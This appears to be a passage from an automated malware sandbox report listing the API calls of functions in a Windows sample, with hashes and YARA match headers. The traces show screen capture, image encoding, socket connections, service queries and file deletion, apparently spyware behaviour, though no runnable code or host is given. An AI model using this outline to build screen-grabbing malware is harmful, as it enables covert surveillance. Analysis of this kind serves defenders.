                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                  • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                                                                  • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                                                                  • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                                                                  • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                                                                  • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                                                                • String ID:
                                                                                • API String ID: 3693186435-0
                                                                                • Opcode ID: f49889d9f3f8c05e91aaf47737627c21e056570786b5222416d419ecac8538af
                                                                                • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                                                                • Opcode Fuzzy Hash: f49889d9f3f8c05e91aaf47737627c21e056570786b5222416d419ecac8538af
                                                                                • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F5F4, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 265COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                  • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                                                                • _itoa.MSVCRT ref: 0040F75C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                  • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                                                                  • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                  • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                  • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                  • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                  • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                                                                  • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$D@1@@$?size@?$basic_string@CreateG@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 3046283666-3785015651
                                                                                • Opcode ID: 00144c1b8b2e9b9337a014d0678191b9883f8d66c678c17fd4e76295d746f7f8
                                                                                • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                                                                • Opcode Fuzzy Hash: 00144c1b8b2e9b9337a014d0678191b9883f8d66c678c17fd4e76295d746f7f8
                                                                                • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041093F, Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 131fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                                                                  • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                  • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                                                                  • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                                                                  • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                                                                  • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                                                                • String ID: dat$image/png$png
                                                                                • API String ID: 3276867942-186023265
                                                                                • Opcode ID: a18e884bca95207fcede919d372a9535aeffc3e1a6f37fab74d1a85295956afe
                                                                                • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                                                                • Opcode Fuzzy Hash: a18e884bca95207fcede919d372a9535aeffc3e1a6f37fab74d1a85295956afe
                                                                                • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041093F, Relevance: 49.1, APIs: 25, Strings: 3, Instructions: 131fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                                                                  • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                  • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                                                                  • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                                                                  • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                                                                  • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00410A22
